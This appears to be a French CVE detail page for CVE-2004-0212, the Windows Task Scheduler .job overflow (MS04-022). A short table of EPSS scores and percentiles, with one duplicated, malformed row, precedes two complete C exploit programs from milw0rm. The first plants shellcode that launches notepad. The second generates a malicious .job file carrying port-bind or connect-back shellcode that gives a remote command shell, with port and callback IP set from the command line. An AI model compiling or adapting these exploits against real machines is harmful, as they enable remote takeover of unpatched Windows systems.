CVE-2004-0212 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	75.1%	–	–
2023-03-12	–	–	–	90.99%	–
2023-06-25	–	–	–	86.09%	–
2024-03-31	–	–	–	86.09%	–
2024-06-02	–	–	–	86.09%	–
2024-12-22	–	–	–	92.19%	–
2025-01-19	–	–	–	92.19%	–
2025-03-18	–	–	–	–	77.59%
2025-03-30	–	–	–	–	78.56%
2025-03-30	–	–	–	–	78.56,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	99%
2023-03-12	98%
2023-06-25	98%
2024-03-31	99%
2024-06-02	99%
2024-12-22	99%
2025-01-19	99%
2025-03-18	99%
2025-03-30	99%
2025-03-30	99%

//************************************************************* // Microsoft Windows 2K/XP Task Scheduler Vulnerability (MS04-022) // Proof-of-Concept Exploit for English WinXP SP1 // 15 Jul 2004 // // Running this will create a file "j.job". When explorer.exe or any // file-open dialog box accesses the directory containing this file, // notepad.exe will be spawn. // // Greetz: snooq, sk and all guys at SIG^2 www security org sg // //************************************************************* #include <stdio.h> #include <windows.h> unsigned char jobfile[] = "\x01\x05\x01\x00\xD9\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\x46\x00\x92\x00\x00\x00\x00\x00\x3C\x00\x0A\x00" "\x20\x00\x00\x00\x00\x14\x73\x0F\x00\x00\x00\x00\x03\x13\x04\x00" "\xC0\x00\x80\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x80\x01\x44\x00\x3A\x00\x5C\x00\x61\x00" "\x2E\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x78\x00\x78\x00\x78\x00\x78\x00\x79\x00\x79\x00\x79\x00\x79\x00" "\x7A\x00\x7A\x00\x7A\x00\x7A\x00\x7B\x00\x7B\x00\x7B\x00" "\x5b\xc1\xbf\x71" // jmp esp in SAMLIB WinXP SP1 "\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44" "\x90\x90" // jmp esp lands here "\xEB\x80" // jmp backward into shellcode "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00" "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00" "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00" "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00" "\x61\x00\x61\x00\x61\x00\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20" "\x20\x20\x20\x20\x20\x20\x00\x00\x00\x00\x04\x00\x44\x00\x3A\x00" "\x5C\x00\x00\x00\x07\x00\x67\x00\x75\x00\x65\x00\x73\x00\x74\x00" "\x31\x00\x00\x00\x00\x00\x00\x00\x08\x00\x03\x13\x04\x00\x00\x00" "\x00\x00\x01\x00\x30\x00\x00\x00\xD4\x07\x07\x00\x0F\x00\x00\x00" "\x00\x00\x00\x00\x0B\x00\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00"; /* * Harmless payload that spawns 'notepad.exe'... =p * Ripped from snooq's WinZip exploit */ unsigned char shellcode[]= "\x33\xc0" // xor eax, eax // slight modification to move esp up "\xb0\xf0" // mov al, 0f0h "\x2b\xe0" // sub esp,eax "\x83\xE4\xF0" // and esp, 0FFFFFFF0h "\x55" // push ebp "\x8b\xec" // mov ebp, esp "\x33\xf6" // xor esi, esi "\x56" // push esi "\x68\x2e\x65\x78\x65" // push 'exe.' "\x68\x65\x70\x61\x64" // push 'dape' "\x68\x90\x6e\x6f\x74" // push 'ton' "\x46" // inc esi "\x56" // push esi "\x8d\x7d\xf1" // lea edi, [ebp-0xf] "\x57" // push edi "\xb8XXXX" // mov eax, XXXX -> WinExec() "\xff\xd0" // call eax "\x4e" // dec esi "\x56" // push esi "\xb8YYYY" // mov eax, YYYY -> ExitProcess() "\xff\xd0"; // call eax int main(int argc, char* argv[]) { unsigned char *ptr = (unsigned char *)shellcode; while (*ptr) { if (*((long *)ptr)==0x58585858) { *((long *)ptr) = (long)GetProcAddress(GetModuleHandle("kernel32.dll"), "WinExec"); } if (*((long *)ptr)==0x59595959) { *((long *)ptr) = (long)GetProcAddress(GetModuleHandle("kernel32.dll"), "ExitProcess"); } ptr++; } FILE *fp; fp = fopen("j.xxx", "wb"); if(fp) { unsigned char *ptr = jobfile + (31 * 16); memcpy(ptr, shellcode, sizeof(shellcode) - 1); fwrite(jobfile, 1, sizeof(jobfile)-1, fp); fclose(fp); DeleteFile("j.job"); MoveFile("j.xxx", "j.job"); } return 0; } // milw0rm.com [2004-07-18]

/* HOD-ms04022-task-expl.c: * * (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit * * Exploit version 0.1 coded by * * * .::[ houseofdabus ]::. * * * [at inbox dot ru] * ------------------------------------------------------------------- * Tested on: * - Internet Explorer 6.0 (SP1) (iexplore.exe) * - Explorer (explorer.exe) * - Windows XP SP0, SP1 * * ------------------------------------------------------------------- * Compile: * Win32/VC++ : cl HOD-ms04022-task-expl.c * Win32/cygwin: gcc HOD-ms04022-task-expl.c -lws2_32.lib * Linux : gcc -o HOD-ms04022-task-expl HOD-ms04022-task-expl.c * * ------------------------------------------------------------------- * Command Line Parameters/Arguments: * * HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP] * * Shellcode: * 1 - Portbind shellcode * 2 - Connectback shellcode * * ------------------------------------------------------------------- * Example: * * C:\>HOD-ms04022-task-expl.exe expl.job 1 7777 * * (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit * * --- Coded by .::[ houseofdabus ]::. --- * * [*] Shellcode: Portbind, port = 7777 * [*] Generate file: expl.job * * C:\> * * start IE -> C:\ * * C:\>telnet localhost 7777 * Microsoft Windows XP [‚¥àá¨ï 5.1.2600] * (‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001. * * C:\Documents and Settings\v.X\ ¡®ç¨© á⮫> * * ------------------------------------------------------------------- * * This is provided as proof-of-concept code only for educational * purposes and testing by authorized individuals with permission to * do so. * */ /* #define _WIN32 */ #include <stdio.h> #include <stdlib.h> #ifdef _WIN32 #pragma comment(lib,"ws2_32") #include <winsock2.h> #else #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #endif unsigned char jobfile[] = /* job header */ "\x01\x05\x01\x00\xD9\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\x46\x00\x92\x00\x00\x00\x00\x00\x3C\x00\x0A\x00" "\x20\x00\x00\x00\x00\x14\x73\x0F\x00\x00\x00\x00\x03\x13\x04\x00" "\xC0\x00\x80\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00" /* length */ "\x11\x11" /* garbage C:\... */ /* unicode */ "\x43\x00\x3A\x00\x5C\x00\x61\x00" "\x2E\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00" "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00" "\x1E\x82\xDC\x77" /* 0x77dc821e - pop reg, pop reg, ret (advapi32.dll) */ /* for Win2k use jmp ebx or call ebx */ "\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" "\x80\x31\x31\x80" /* generate exception */ "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00" "\x90\x90"; /* portbind shellcode */ unsigned char portbindsc[] = "\x90\x90" "\x90\x90\xEB\x06" /* overwrite SEH-frame */ "\x90\x90" "\x90\x90\x90\x90" "\x90\x90\x90\x90" "\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c" "\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b" "\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78" "\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b" "\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03" "\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b" "\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c" "\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4" "\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3" "\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70" "\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6" "\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e" "\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83" "\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32" "\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59" "\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50" "\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50" "\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14" "\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc" "\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c" "\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33" "\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44" "\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d" "\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50" "\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55" "\x28\xff\x55\x0c"; /* connectback shellcode */ unsigned char connectbacksc[] = "\x90\x90" "\x90\x90\xEB\x06" /* overwrite SEH-frame */ "\x90\x90" "\x90\x90\x90\x90" "\x90\x90\x90\x90" "\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c" "\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b" "\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78" "\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b" "\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03" "\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b" "\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c" "\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4" "\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3" "\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa" "\x60\xcb\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02" "\xeb\x05\xe8\xf9\xff\xff\xff\x5e\xe8\x45\xff\xff\xff\x8b\xd0\x83" "\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10\xe8\xa5\xff\xff\xff\x83" "\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f\x8b\xdc" "\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8" "\x01\x63\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90" "\x01\x2b\xe0\x54\x83\xc0\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50" "\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0\x68\x7f\x01\x01\x01\xb8" "\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50\x53\x56" "\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa" "\x5f\xc6\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab" "\x5f\x33\xc0\x8d\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50" "\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff" "\x77\x38\xff\x55\x20\xff\x55\x0c"; /* use this form unsigned char sc[] = "\x90\x90" "\x90\x90\xEB\x06" - overwrite SEH-frame "\x90\x90" "\x90\x90\x90\x90" "\x90\x90\x90\x90" "... code ..."; */ unsigned char endofjob[] = "\x00\x00\x00\x00"; #define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300+16)) = (port) #define SET_CONNECTBACK_IP(buf, ip) *(unsigned long *)(((buf)+283+16)) = (ip) #define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+290+16)) = (port) void usage(char *prog) { printf("Usage:\n"); printf("%s <file> <shellcode> <bind/connectback port> [connectback IP]\n", prog); printf("\nShellcode:\n"); printf(" 1 - Portbind shellcode\n"); printf(" 2 - Connectback shellcode\n\n"); exit(0); } int main(int argc, char **argv) { unsigned short strlen; unsigned short port; unsigned long ip, sc; FILE *fp, *fp2; printf("\n(MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit\n\n"); printf("--- Coded by .::[ houseofdabus ]::. ---\n\n"); if (argc < 4) usage(argv[0]); sc = atoi(argv[2]); if ( ((sc == 2) && (argc < 5)) || (sc > 2)) usage(argv[0]); fp = fopen(argv[1], "wb"); if (fp == NULL) { printf("[-] error: can\'t create file: %s\n", argv[1]); exit(0); } /* header & garbage */ fwrite(jobfile, 1, sizeof(jobfile)-1, fp); fseek(fp, 39*16, SEEK_SET); port = atoi(argv[3]); printf("[*] Shellcode: "); if (sc == 1) { SET_PORTBIND_PORT(portbindsc, htons(port)); printf("Portbind, port = %u\n", port); fwrite(portbindsc, 1, sizeof(portbindsc)-1, fp); fwrite(endofjob, 1, 4, fp); fseek(fp, 70, SEEK_SET); /* calculate length (see header) */ strlen = (sizeof(jobfile)-1-71+sizeof(portbindsc)-1+4)/2; } else { ip = inet_addr(argv[4]); SET_CONNECTBACK_IP(connectbacksc, ip); SET_CONNECTBACK_PORT(connectbacksc, htons(port)); printf("Connectback, port = %u, IP = %s\n", port, argv[4]); fwrite(connectbacksc, 1, sizeof(connectbacksc)-1, fp); fwrite(endofjob, 1, 4, fp); fseek(fp, 70, SEEK_SET); /* calculate length (see header) */ strlen = (sizeof(jobfile)-1-71+sizeof(connectbacksc)-1+4)/2; } printf("[*] Generate file: %s\n", argv[1]); fwrite(&strlen, 1, 2, fp); fclose(fp); return 0; } // milw0rm.com [2004-07-31]